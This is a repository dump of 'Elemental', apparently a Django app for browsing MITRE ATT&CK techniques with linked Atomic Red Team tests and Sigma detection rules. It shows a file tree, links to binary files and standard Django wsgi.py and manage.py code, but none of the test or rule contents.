├── LICENSE
├── README.md
├── elemental
├── __pycache__
│ ├── atomics_imports.cpython-36.pyc
│ ├── attack_imports.cpython-36.pyc
│ ├── attackcti_exporter.cpython-36.pyc
│ ├── import_abbrvs.cpython-36.pyc
│ └── sigma_rule_imports.cpython-36.pyc
├── db.sqlite3
├── elemental
│ ├── __init__.py
│ ├── __pycache__
│ │ ├── __init__.cpython-36.pyc
│ │ ├── settings.cpython-36.pyc
│ │ ├── urls.cpython-36.pyc
│ │ └── wsgi.cpython-36.pyc
│ ├── settings.py
│ ├── urls.py
│ └── wsgi.py
├── manage.py
├── matrix
│ ├── __init__.py
│ ├── __pycache__
│ │ ├── __init__.cpython-36.pyc
│ │ ├── admin.cpython-36.pyc
│ │ ├── forms.cpython-36.pyc
│ │ ├── models.cpython-36.pyc
│ │ ├── urls.cpython-36.pyc
│ │ └── views.cpython-36.pyc
│ ├── admin.py
│ ├── apps.py
│ ├── forms.py
│ ├── migrations
│ │ ├── 0001_initial.py
│ │ ├── __init__.py
│ │ └── __pycache__
│ │ │ ├── 0001_initial.cpython-36.pyc
│ │ │ └── __init__.cpython-36.pyc
│ ├── models.py
│ ├── static
│ │ └── matrix
│ │ │ ├── elemental.png
│ │ │ └── style.css
│ ├── templates
│ │ ├── base_generic.html
│ │ ├── base_generic_elements.html
│ │ ├── base_generic_no_header.html
│ │ ├── elemental.png
│ │ ├── index.html
│ │ └── matrix
│ │ │ ├── TacticTemplate.html
│ │ │ ├── addSigma.html
│ │ │ ├── addTechnique.html
│ │ │ ├── addnote.html
│ │ │ ├── atomic.html
│ │ │ ├── noteForm.html
│ │ │ ├── note_detail.html
│ │ │ ├── note_form.html
│ │ │ ├── tactic_detail.html
│ │ │ ├── tactic_list.html
│ │ │ └── technique.html
│ ├── templatetags
│ │ ├── __init__.py
│ │ ├── __pycache__
│ │ │ ├── __init__.cpython-36.pyc
│ │ │ └── short_name.cpython-36.pyc
│ │ └── short_name.py
│ ├── tests.py
│ ├── urls.py
│ └── views.py
├── media
│ ├── atomics
│ │ ├── T1002.md
│ │ ├── T1002.yaml
│ │ ├── T1003.md
│ │ ├── T1003.yaml
│ │ ├── T1004.md
│ │ ├── T1004.yaml
│ │ ├── T1005.md
│ │ ├── T1005.yaml
│ │ ├── T1007.md
│ │ ├── T1007.yaml
│ │ ├── T1009.md
│ │ ├── T1009.yaml
│ │ ├── T1010.md
│ │ ├── T1010.yaml
│ │ ├── T1012.md
│ │ ├── T1012.yaml
│ │ ├── T1014.md
│ │ ├── T1014.yaml
│ │ ├── T1015.md
│ │ ├── T1015.yaml
│ │ ├── T1016.md
│ │ ├── T1016.yaml
│ │ ├── T1018.md
│ │ ├── T1018.yaml
│ │ ├── T1022.md
│ │ ├── T1022.yaml
│ │ ├── T1023.md
│ │ ├── T1023.yaml
│ │ ├── T1027.md
│ │ ├── T1027.yaml
│ │ ├── T1028.md
│ │ ├── T1028.yaml
│ │ ├── T1030.md
│ │ ├── T1030.yaml
│ │ ├── T1031.md
│ │ ├── T1031.yaml
│ │ ├── T1033.md
│ │ ├── T1033.yaml
│ │ ├── T1035.md
│ │ ├── T1035.yaml
│ │ ├── T1036.md
│ │ ├── T1036.yaml
│ │ ├── T1037.md
│ │ ├── T1037.yaml
│ │ ├── T1038.md
│ │ ├── T1038.yaml
│ │ ├── T1040.md
│ │ ├── T1040.yaml
│ │ ├── T1042.md
│ │ ├── T1042.yaml
│ │ ├── T1044.md
│ │ ├── T1044.yaml
│ │ ├── T1046.md
│ │ ├── T1046.yaml
│ │ ├── T1047.md
│ │ ├── T1047.yaml
│ │ ├── T1048.md
│ │ ├── T1048.yaml
│ │ ├── T1049.md
│ │ ├── T1049.yaml
│ │ ├── T1050.md
│ │ ├── T1050.yaml
│ │ ├── T1053.md
│ │ ├── T1053.yaml
│ │ ├── T1055.md
│ │ ├── T1055.yaml
│ │ ├── T1056.md
│ │ ├── T1056.yaml
│ │ ├── T1057.md
│ │ ├── T1057.yaml
│ │ ├── T1058.md
│ │ ├── T1058.yaml
│ │ ├── T1059.md
│ │ ├── T1059.yaml
│ │ ├── T1060.md
│ │ ├── T1060.yaml
│ │ ├── T1062.md
│ │ ├── T1062.yaml
│ │ ├── T1063.md
│ │ ├── T1063.yaml
│ │ ├── T1064.md
│ │ ├── T1064.yaml
│ │ ├── T1065.md
│ │ ├── T1065.yaml
│ │ ├── T1069.md
│ │ ├── T1069.yaml
│ │ ├── T1070.md
│ │ ├── T1070.yaml
│ │ ├── T1071.md
│ │ ├── T1071.yaml
│ │ ├── T1073.md
│ │ ├── T1073.yaml
│ │ ├── T1074.md
│ │ ├── T1074.yaml
│ │ ├── T1075.md
│ │ ├── T1075.yaml
│ │ ├── T1076.md
│ │ ├── T1076.yaml
│ │ ├── T1077.md
│ │ ├── T1077.yaml
│ │ ├── T1081.md
│ │ ├── T1081.yaml
│ │ ├── T1082.md
│ │ ├── T1082.yaml
│ │ ├── T1083.md
│ │ ├── T1083.yaml
│ │ ├── T1084.md
│ │ ├── T1084.yaml
│ │ ├── T1085.md
│ │ ├── T1085.yaml
│ │ ├── T1086.md
│ │ ├── T1086.yaml
│ │ ├── T1087.md
│ │ ├── T1087.yaml
│ │ ├── T1088.md
│ │ ├── T1088.yaml
│ │ ├── T1089.md
│ │ ├── T1089.yaml
│ │ ├── T1090.md
│ │ ├── T1090.yaml
│ │ ├── T1096.md
│ │ ├── T1096.yaml
│ │ ├── T1097.md
│ │ ├── T1097.yaml
│ │ ├── T1098.md
│ │ ├── T1098.yaml
│ │ ├── T1099.md
│ │ ├── T1099.yaml
│ │ ├── T1100.md
│ │ ├── T1100.yaml
│ │ ├── T1101.md
│ │ ├── T1101.yaml
│ │ ├── T1102.md
│ │ ├── T1102.yaml
│ │ ├── T1103.md
│ │ ├── T1103.yaml
│ │ ├── T1105.md
│ │ ├── T1105.yaml
│ │ ├── T1107.md
│ │ ├── T1107.yaml
│ │ ├── T1110.md
│ │ ├── T1110.yaml
│ │ ├── T1112.md
│ │ ├── T1112.yaml
│ │ ├── T1113.md
│ │ ├── T1113.yaml
│ │ ├── T1114.md
│ │ ├── T1114.yaml
│ │ ├── T1115.md
│ │ ├── T1115.yaml
│ │ ├── T1117.md
│ │ ├── T1117.yaml
│ │ ├── T1118.md
│ │ ├── T1118.yaml
│ │ ├── T1119.md
│ │ ├── T1119.yaml
│ │ ├── T1121.md
│ │ ├── T1121.yaml
│ │ ├── T1122.md
│ │ ├── T1122.yaml
│ │ ├── T1123.md
│ │ ├── T1123.yaml
│ │ ├── T1124.md
│ │ ├── T1124.yaml
│ │ ├── T1126.md
│ │ ├── T1126.yaml
│ │ ├── T1127.md
│ │ ├── T1127.yaml
│ │ ├── T1128.md
│ │ ├── T1128.yaml
│ │ ├── T1130.md
│ │ ├── T1130.yaml
│ │ ├── T1132.md
│ │ ├── T1132.yaml
│ │ ├── T1134.md
│ │ ├── T1134.yaml
│ │ ├── T1135.md
│ │ ├── T1135.yaml
│ │ ├── T1136.md
│ │ ├── T1136.yaml
│ │ ├── T1137.md
│ │ ├── T1137.yaml
│ │ ├── T1138.md
│ │ ├── T1138.yaml
│ │ ├── T1139.md
│ │ ├── T1139.yaml
│ │ ├── T1140.md
│ │ ├── T1140.yaml
│ │ ├── T1141.md
│ │ ├── T1141.yaml
│ │ ├── T1142.md
│ │ ├── T1142.yaml
│ │ ├── T1143.md
│ │ ├── T1143.yaml
│ │ ├── T1144.md
│ │ ├── T1144.yaml
│ │ ├── T1145.md
│ │ ├── T1145.yaml
│ │ ├── T1146.md
│ │ ├── T1146.yaml
│ │ ├── T1147.md
│ │ ├── T1147.yaml
│ │ ├── T1148.md
│ │ ├── T1148.yaml
│ │ ├── T1150.md
│ │ ├── T1150.yaml
│ │ ├── T1151.md
│ │ ├── T1151.yaml
│ │ ├── T1152.md
│ │ ├── T1152.yaml
│ │ ├── T1153.md
│ │ ├── T1153.yaml
│ │ ├── T1154.md
│ │ ├── T1154.yaml
│ │ ├── T1155.md
│ │ ├── T1155.yaml
│ │ ├── T1156.md
│ │ ├── T1156.yaml
│ │ ├── T1158.md
│ │ ├── T1158.yaml
│ │ ├── T1159.md
│ │ ├── T1159.yaml
│ │ ├── T1160.md
│ │ ├── T1160.yaml
│ │ ├── T1163.md
│ │ ├── T1163.yaml
│ │ ├── T1164.md
│ │ ├── T1164.yaml
│ │ ├── T1165.md
│ │ ├── T1165.yaml
│ │ ├── T1166.md
│ │ ├── T1166.yaml
│ │ ├── T1168.md
│ │ ├── T1168.yaml
│ │ ├── T1169.md
│ │ ├── T1169.yaml
│ │ ├── T1170.md
│ │ ├── T1170.yaml
│ │ ├── T1173.md
│ │ ├── T1173.yaml
│ │ ├── T1174.md
│ │ ├── T1174.yaml
│ │ ├── T1176.md
│ │ ├── T1176.yaml
│ │ ├── T1179.md
│ │ ├── T1179.yaml
│ │ ├── T1180.md
│ │ ├── T1180.yaml
│ │ ├── T1183.md
│ │ ├── T1183.yaml
│ │ ├── T1191.md
│ │ ├── T1191.yaml
│ │ ├── T1193.md
│ │ ├── T1193.yaml
│ │ ├── T1196.md
│ │ ├── T1196.yaml
│ │ ├── T1197.md
│ │ ├── T1197.yaml
│ │ ├── T1201.md
│ │ ├── T1201.yaml
│ │ ├── T1202.md
│ │ ├── T1202.yaml
│ │ ├── T1206.md
│ │ ├── T1206.yaml
│ │ ├── T1207.md
│ │ ├── T1207.yaml
│ │ ├── T1208.md
│ │ ├── T1208.yaml
│ │ ├── T1214.md
│ │ ├── T1214.yaml
│ │ ├── T1215.md
│ │ ├── T1215.yaml
│ │ ├── T1216.md
│ │ ├── T1216.yaml
│ │ ├── T1217.md
│ │ ├── T1217.yaml
│ │ ├── T1218.md
│ │ ├── T1218.yaml
│ │ ├── T1220.md
│ │ ├── T1220.yaml
│ │ ├── T1222.md
│ │ ├── T1222.yaml
│ │ ├── T1223.md
│ │ ├── T1223.yaml
│ │ ├── T1482.md
│ │ ├── T1482.yaml
│ │ ├── T1485.md
│ │ ├── T1485.yaml
│ │ ├── T1489.md
│ │ ├── T1489.yaml
│ │ ├── T1490.md
│ │ ├── T1490.yaml
│ │ ├── T1496.md
│ │ ├── T1496.yaml
│ │ ├── T1500.md
│ │ ├── T1500.yaml
│ │ ├── T1501.md
│ │ ├── T1501.yaml
│ │ ├── T1504.md
│ │ ├── T1504.yaml
│ │ ├── T1505.md
│ │ ├── T1505.yaml
│ │ ├── T1518.md
│ │ ├── T1518.yaml
│ │ ├── T1529.md
│ │ ├── T1529.yaml
│ │ ├── T1531.md
│ │ └── T1531.yaml
│ ├── elemental.png
│ └── sigma_rules
│ │ ├── apt_apt29_thinktanks.yml
│ │ ├── apt_apt29_tor.yml
│ │ ├── apt_babyshark.yml
│ │ ├── apt_bear_activity_gtr19.yml
│ │ ├── apt_carbonpaper_turla.yml
│ │ ├── apt_chafer_mar18.yml
│ │ ├── apt_cloudhopper.yml
│ │ ├── apt_empiremonkey.yml
│ │ ├── apt_equationgroup_dll_u_load.yml
│ │ ├── apt_equationgroup_lnx.yml
│ │ ├── apt_hurricane_panda.yml
│ │ ├── apt_judgement_panda_gtr19.yml
│ │ ├── apt_oceanlotus_registry.yml
│ │ ├── apt_pandemic.yml
│ │ ├── apt_slingshot.yml
│ │ ├── apt_sofacy.yml
│ │ ├── apt_stonedrill.yml
│ │ ├── apt_ta17_293a_ps.yml
│ │ ├── apt_tropictrooper.yml
│ │ ├── apt_turla_commands.yml
│ │ ├── apt_turla_service_png.yml
│ │ ├── apt_unidentified_nov_18.yml
│ │ ├── apt_zxshell.yml
│ │ ├── av_exploiting.yml
│ │ ├── av_password_dumper.yml
│ │ ├── av_webshell.yml
│ │ ├── crime_fireball.yml
│ │ ├── lnx_auditd_alter_bash_profile.yml
│ │ ├── lnx_auditd_masquerading_crond.yml
│ │ ├── lnx_auditd_user_discovery.yml
│ │ ├── lnx_auditd_web_rce.yml
│ │ ├── lnx_data_compressed.yml
│ │ ├── lnx_network_sniffing.yml
│ │ ├── lnx_shell_clear_cmd_history.yml
│ │ ├── lnx_shell_priv_esc_prep.yml
│ │ ├── lnx_sudo_cve_2019_14287.yml
│ │ ├── net_dns_c2_detection.yml
│ │ ├── net_susp_dns_txt_exec_strings.yml
│ │ ├── powershell_data_compressed.yml
│ │ ├── powershell_downgrade_attack.yml
│ │ ├── powershell_exe_calling_ps.yml
│ │ ├── powershell_malicious_commandlets.yml
│ │ ├── powershell_malicious_keywords.yml
│ │ ├── powershell_ntfs_ads_access.yml
│ │ ├── powershell_prompt_credentials.yml
│ │ ├── powershell_psattack.yml
│ │ ├── powershell_shellcode_b64.yml
│ │ ├── powershell_suspicious_download.yml
│ │ ├── powershell_suspicious_invocation_generic.yml
│ │ ├── powershell_suspicious_invocation_specific.yml
│ │ ├── powershell_suspicious_keywords.yml
│ │ ├── powershell_winlogon_helper_dll.yml
│ │ ├── proxy_cobalt_amazon.yml
│ │ ├── proxy_cobalt_ocsp.yml
│ │ ├── proxy_cobalt_onedrive.yml
│ │ ├── proxy_raw_paste_service_access.yml
│ │ ├── sysmon_ads_executable.yml
│ │ ├── sysmon_cactustorch.yml
│ │ ├── sysmon_cmstp_execution.yml
│ │ ├── sysmon_cobaltstrike_process_injection.yml
│ │ ├── sysmon_dhcp_calloutdll.yml
│ │ ├── sysmon_dns_serverlevelplugindll.yml
│ │ ├── sysmon_ghostpack_safetykatz.yml
│ │ ├── sysmon_logon_scripts_userinitmprlogonscript.yml
│ │ ├── sysmon_lsass_memdump.yml
│ │ ├── sysmon_mal_namedpipes.yml
│ │ ├── sysmon_malware_backconnect_ports.yml
│ │ ├── sysmon_malware_verclsid_shellcode.yml
│ │ ├── sysmon_mimikatz_detection_lsass.yml
│ │ ├── sysmon_mimikatz_inmemory_detection.yml
│ │ ├── sysmon_mimikatz_trough_winrm.yml
│ │ ├── sysmon_password_dumper_lsass.yml
│ │ ├── sysmon_powershell_exploit_scripts.yml
│ │ ├── sysmon_powershell_network_connection.yml
│ │ ├── sysmon_quarkspw_filedump.yml
│ │ ├── sysmon_rdp_reverse_tunnel.yml
│ │ ├── sysmon_registry_persistence_key_linking.yml
│ │ ├── sysmon_renamed_procdump.yml
│ │ ├── sysmon_rundll32_net_connections.yml
│ │ ├── sysmon_ssp_added_lsa_config.yml
│ │ ├── sysmon_stickykey_like_backdoor.yml
│ │ ├── sysmon_susp_download_run_key.yml
│ │ ├── sysmon_susp_driver_load.yml
│ │ ├── sysmon_susp_file_characteristics.yml
│ │ ├── sysmon_susp_image_load.yml
│ │ ├── sysmon_susp_lsass_dll_load.yml
│ │ ├── sysmon_susp_powershell_rundll32.yml
│ │ ├── sysmon_susp_rdp.yml
│ │ ├── sysmon_susp_reg_persist_explorer_run.yml
│ │ ├── sysmon_susp_run_key_img_folder.yml
│ │ ├── sysmon_svchost_dll_search_order_hijack.yml
│ │ ├── sysmon_uac_bypass_eventvwr.yml
│ │ ├── sysmon_uac_bypass_sdclt.yml
│ │ ├── sysmon_webshell_creation_detect.yml
│ │ ├── sysmon_win_binary_github_com.yml
│ │ ├── sysmon_win_binary_susp_com.yml
│ │ ├── sysmon_win_reg_persistence.yml
│ │ ├── sysmon_wmi_event_subscription.yml
│ │ ├── sysmon_wmi_persistence_commandline_event_consumer.yml
│ │ ├── sysmon_wmi_persistence_script_event_consumer_write.yml
│ │ ├── sysmon_wmi_susp_scripting.yml
│ │ ├── web_cve_2018_2894_weblogic_exploit.yml
│ │ ├── win_GPO_scheduledtasks.yml
│ │ ├── win_account_discovery.yml
│ │ ├── win_admin_rdp_login.yml
│ │ ├── win_admin_share_access.yml
│ │ ├── win_alert_active_directory_user_control.yml
│ │ ├── win_alert_ad_user_backdoors.yml
│ │ ├── win_alert_enable_weak_encryption.yml
│ │ ├── win_alert_lsass_access.yml
│ │ ├── win_alert_mimikatz_keywords.yml
│ │ ├── win_alert_ruler.yml
│ │ ├── win_apt_bluemashroom.yml
│ │ ├── win_atsvc_task.yml
│ │ ├── win_attrib_hiding_files.yml
│ │ ├── win_bypass_squiblytwo.yml
│ │ ├── win_change_default_file_association.yml
│ │ ├── win_cmdkey_recon.yml
│ │ ├── win_cmstp_com_object_access.yml
│ │ ├── win_control_panel_item.yml
│ │ ├── win_data_compressed_with_rar.yml
│ │ ├── win_dcsync.yml
│ │ ├── win_disable_event_logging.yml
│ │ ├── win_encoded_frombase64string.yml
│ │ ├── win_encoded_iex.yml
│ │ ├── win_etw_trace_evasion.yml
│ │ ├── win_exploit_cve_2015_1641.yml
│ │ ├── win_exploit_cve_2017_0261.yml
│ │ ├── win_exploit_cve_2017_11882.yml
│ │ ├── win_exploit_cve_2017_8759.yml
│ │ ├── win_exploit_cve_2019_1378.yml
│ │ ├── win_exploit_cve_2019_1388.yml
│ │ ├── win_hack_rubeus.yml
│ │ ├── win_hack_smbexec.yml
│ │ ├── win_hwp_exploits.yml
│ │ ├── win_impacket_lateralization.yml
│ │ ├── win_impacket_secretdump.yml
│ │ ├── win_install_reg_debugger_backdoor.yml
│ │ ├── win_kernel_and_3rd_party_drivers_exploits_token_stealing.yml
│ │ ├── win_lethalhta.yml
│ │ ├── win_lm_namedpipe.yml
│ │ ├── win_local_system_owner_account_discovery.yml
│ │ ├── win_mal_adwind.yml
│ │ ├── win_mal_creddumper.yml
│ │ ├── win_mal_service_installs.yml
│ │ ├── win_mal_ursnif.yml
│ │ ├── win_mal_wceaux_dll.yml
│ │ ├── win_malware_dridex.yml
│ │ ├── win_malware_notpetya.yml
│ │ ├── win_malware_script_dropper.yml
│ │ ├── win_mavinject_proc_inj.yml
│ │ ├── win_mmc_spawn_shell.yml
│ │ ├── win_mshta_spawn_shell.yml
│ │ ├── win_net_ntlm_downgrade.yml
│ │ ├── win_netsh_fw_add.yml
│ │ ├── win_netsh_packet_capture.yml
│ │ ├── win_netsh_port_fwd.yml
│ │ ├── win_netsh_port_fwd_3389.yml
│ │ ├── win_network_sniffing.yml
│ │ ├── win_office_shell.yml
│ │ ├── win_office_spawn_exe_from_users_directory.yml
│ │ ├── win_overpass_the_hash.yml
│ │ ├── win_pass_the_hash.yml
│ │ ├── win_pass_the_hash_2.yml
│ │ ├── win_plugx_susp_exe_locations.yml
│ │ ├── win_possible_applocker_bypass.yml
│ │ ├── win_powershell_amsi_bypass.yml
│ │ ├── win_powershell_b64_shellcode.yml
│ │ ├── win_powershell_dll_execution.yml
│ │ ├── win_powershell_download.yml
│ │ ├── win_powershell_suspicious_parameter_variation.yml
│ │ ├── win_powershell_xor_commandline.yml
│ │ ├── win_powersploit_empire_schtasks.yml
│ │ ├── win_proc_wrong_parent.yml
│ │ ├── win_process_creation_bitsadmin_download.yml
│ │ ├── win_psexesvc_start.yml
│ │ ├── win_query_registry.yml
│ │ ├── win_rare_schtask_creation.yml
│ │ ├── win_rare_schtasks_creations.yml
│ │ ├── win_rare_service_installs.yml
│ │ ├── win_rdp_bluekeep_poc_scanner.yml
│ │ ├── win_rdp_localhost_login.yml
│ │ ├── win_rdp_potential_cve-2019-0708.yml
│ │ ├── win_rdp_reverse_tunnel.yml
│ │ ├── win_renamed_binary.yml
│ │ ├── win_renamed_paexec.yml
│ │ ├── win_sdbinst_shim_persistence.yml
│ │ ├── win_service_execution.yml
│ │ ├── win_shell_spawn_susp_program.yml
│ │ ├── win_spn_enum.yml
│ │ ├── win_susp_add_sid_history.yml
│ │ ├── win_susp_backup_delete.yml
│ │ ├── win_susp_bcdedit.yml
│ │ ├── win_susp_bginfo.yml
│ │ ├── win_susp_calc.yml
│ │ ├── win_susp_cdb.yml
│ │ ├── win_susp_certutil_command.yml
│ │ ├── win_susp_cli_escape.yml
│ │ ├── win_susp_cmd_http_appdata.yml
│ │ ├── win_susp_codeintegrity_check_failure.yml
│ │ ├── win_susp_commands_recon_activity.yml
│ │ ├── win_susp_compression_params.yml
│ │ ├── win_susp_comsvcs_procdump.yml
│ │ ├── win_susp_control_dll_load.yml
│ │ ├── win_susp_csc.yml
│ │ ├── win_susp_csc_folder.yml
│ │ ├── win_susp_devtoolslauncher.yml
│ │ ├── win_susp_dhcp_config.yml
│ │ ├── win_susp_dhcp_config_failed.yml
│ │ ├── win_susp_dns_config.yml
│ │ ├── win_susp_dnx.yml
│ │ ├── win_susp_double_extension.yml
│ │ ├── win_susp_dsrm_password_change.yml
│ │ ├── win_susp_dxcap.yml
│ │ ├── win_susp_eventlog_clear.yml
│ │ ├── win_susp_eventlog_cleared.yml
│ │ ├── win_susp_exec_folder.yml
│ │ ├── win_susp_execution_path.yml
│ │ ├── win_susp_execution_path_webserver.yml
│ │ ├── win_susp_failed_logon_reasons.yml
│ │ ├── win_susp_failed_logons_single_source.yml
│ │ ├── win_susp_gup.yml
│ │ ├── win_susp_interactive_logons.yml
│ │ ├── win_susp_iss_module_install.yml
│ │ ├── win_susp_kerberos_manipulation.yml
│ │ ├── win_susp_lsass_dump.yml
│ │ ├── win_susp_mshta_execution.yml
│ │ ├── win_susp_msiexec_cwd.yml
│ │ ├── win_susp_msmpeng_crash.yml
│ │ ├── win_susp_msoffice.yml
│ │ ├── win_susp_net_recon_activity.yml
│ │ ├── win_susp_ntdsutil.yml
│ │ ├── win_susp_ntlm_auth.yml
│ │ ├── win_susp_odbcconf.yml
│ │ ├── win_susp_openwith.yml
│ │ ├── win_susp_outlook.yml
│ │ ├── win_susp_outlook_temp.yml
│ │ ├── win_susp_ping_hex_ip.yml
│ │ ├── win_susp_powershell_empire_launch.yml
│ │ ├── win_susp_powershell_empire_uac_bypass.yml
│ │ ├── win_susp_powershell_enc_cmd.yml
│ │ ├── win_susp_powershell_hidden_b64_cmd.yml
│ │ ├── win_susp_powershell_parent_combo.yml
│ │ ├── win_susp_procdump.yml
│ │ ├── win_susp_prog_location_process_starts.yml
│ │ ├── win_susp_ps_appdata.yml
│ │ ├── win_susp_psexec.yml
│ │ ├── win_susp_psr_capture_screenshots.yml
│ │ ├── win_susp_rasdial_activity.yml
│ │ ├── win_susp_rc4_kerberos.yml
│ │ ├── win_susp_recon_activity.yml
│ │ ├── win_susp_regsvr32_anomalies.yml
│ │ ├── win_susp_rottenpotato.yml
│ │ ├── win_susp_run_locations.yml
│ │ ├── win_susp_rundll32_activity.yml
│ │ ├── win_susp_rundll32_by_ordinal.yml
│ │ ├── win_susp_sam_dump.yml
│ │ ├── win_susp_samr_pwset.yml
│ │ ├── win_susp_schtask_creation.yml
│ │ ├── win_susp_script_execution.yml
│ │ ├── win_susp_sdelete.yml
│ │ ├── win_susp_security_eventlog_cleared.yml
│ │ ├── win_susp_svchost.yml
│ │ ├── win_susp_sysvol_access.yml
│ │ ├── win_susp_taskmgr_localsystem.yml
│ │ ├── win_susp_taskmgr_parent.yml
│ │ ├── win_susp_time_modification.yml
│ │ ├── win_susp_tscon_localsystem.yml
│ │ ├── win_susp_tscon_rdp_redirect.yml
│ │ ├── win_susp_vssadmin_ntds_activity.yml
│ │ ├── win_susp_whoami.yml
│ │ ├── win_susp_wmi_execution.yml
│ │ ├── win_susp_wmi_login.yml
│ │ ├── win_system_exe_anomaly.yml
│ │ ├── win_tool_psexec.yml
│ │ ├── win_usb_device_plugged.yml
│ │ ├── win_user_added_to_local_administrators.yml
│ │ ├── win_user_creation.yml
│ │ ├── win_vul_java_remote_debugging.yml
│ │ ├── win_webshell_detection.yml
│ │ ├── win_webshell_spawn.yml
│ │ ├── win_win10_sched_task_0day.yml
│ │ ├── win_wmi_backdoor_exchange_transport_agent.yml
│ │ ├── win_wmi_persistence.yml
│ │ ├── win_wmi_persistence_script_event_consumer.yml
│ │ ├── win_wmi_spwns_powershell.yml
│ │ ├── win_workflow_compiler.yml
│ │ └── win_xsl_script_processing.yml
└── requirements.txt
└── images
├── 97.png
├── Atomic.png
├── AtomicYaml.png
├── Sigma.png
├── Technique.png
└── elementalUI.png
/elemental/__pycache__/atomics_imports.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/elemental/__pycache__/atomics_imports.cpython-36.pyc
--------------------------------------------------------------------------------
/elemental/__pycache__/attack_imports.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/elemental/__pycache__/attack_imports.cpython-36.pyc
--------------------------------------------------------------------------------
/elemental/__pycache__/attackcti_exporter.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/elemental/__pycache__/attackcti_exporter.cpython-36.pyc
--------------------------------------------------------------------------------
/elemental/__pycache__/import_abbrvs.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/elemental/__pycache__/import_abbrvs.cpython-36.pyc
--------------------------------------------------------------------------------
/elemental/__pycache__/sigma_rule_imports.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/elemental/__pycache__/sigma_rule_imports.cpython-36.pyc
--------------------------------------------------------------------------------
/elemental/db.sqlite3:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/elemental/db.sqlite3
--------------------------------------------------------------------------------
/elemental/elemental/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/elemental/elemental/__init__.py
--------------------------------------------------------------------------------
/elemental/elemental/__pycache__/__init__.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/elemental/elemental/__pycache__/__init__.cpython-36.pyc
--------------------------------------------------------------------------------
/elemental/elemental/__pycache__/settings.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/elemental/elemental/__pycache__/settings.cpython-36.pyc
--------------------------------------------------------------------------------
/elemental/elemental/__pycache__/urls.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/elemental/elemental/__pycache__/urls.cpython-36.pyc
--------------------------------------------------------------------------------
/elemental/elemental/__pycache__/wsgi.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/elemental/elemental/__pycache__/wsgi.cpython-36.pyc
--------------------------------------------------------------------------------
/elemental/elemental/wsgi.py:
--------------------------------------------------------------------------------
"""
WSGI config for elemental project.

It exposes the WSGI callable as a module-level variable named ``application``.

For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""

import os

from django.core.wsgi import get_wsgi_application

# Fall back to the project's own settings module only when the environment has
# not already chosen one, so a deployment can point at a different settings
# file without editing this module.
if 'DJANGO_SETTINGS_MODULE' not in os.environ:
    os.environ['DJANGO_SETTINGS_MODULE'] = 'elemental.settings'

# The callable a WSGI server (gunicorn, uWSGI, mod_wsgi, ...) imports and serves.
application = get_wsgi_application()
17 |
--------------------------------------------------------------------------------
/elemental/manage.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | """Django's command-line utility for administrative tasks."""
3 | import os
4 | import sys
5 |
6 |
def main():
    """Run Django's command-line utility with this process's ``sys.argv``.

    Points ``DJANGO_SETTINGS_MODULE`` at ``elemental.settings`` unless the
    environment already set it, then hands the arguments to Django's
    command dispatcher.

    Raises:
        ImportError: when Django itself cannot be imported (not installed,
            not on ``PYTHONPATH``, or the virtual environment is not active).
    """
    os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'elemental.settings')
    try:
        # Imported lazily so a missing Django can be reported with a hint
        # instead of a bare import failure at module load.
        from django.core.management import execute_from_command_line
    except ImportError as exc:
        hint = (
            "Couldn't import Django. Are you sure it's installed and "
            "available on your PYTHONPATH environment variable? Did you "
            "forget to activate a virtual environment?"
        )
        raise ImportError(hint) from exc
    else:
        execute_from_command_line(sys.argv)


if __name__ == '__main__':
    main()
22 |
--------------------------------------------------------------------------------
/elemental/matrix/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/elemental/matrix/__init__.py
--------------------------------------------------------------------------------
/elemental/matrix/__pycache__/__init__.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/elemental/matrix/__pycache__/__init__.cpython-36.pyc
--------------------------------------------------------------------------------
/elemental/matrix/__pycache__/admin.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/elemental/matrix/__pycache__/admin.cpython-36.pyc
--------------------------------------------------------------------------------
/elemental/matrix/__pycache__/forms.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/elemental/matrix/__pycache__/forms.cpython-36.pyc
--------------------------------------------------------------------------------
/elemental/matrix/__pycache__/models.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/elemental/matrix/__pycache__/models.cpython-36.pyc
--------------------------------------------------------------------------------
/elemental/matrix/__pycache__/urls.cpython-36.pyc:
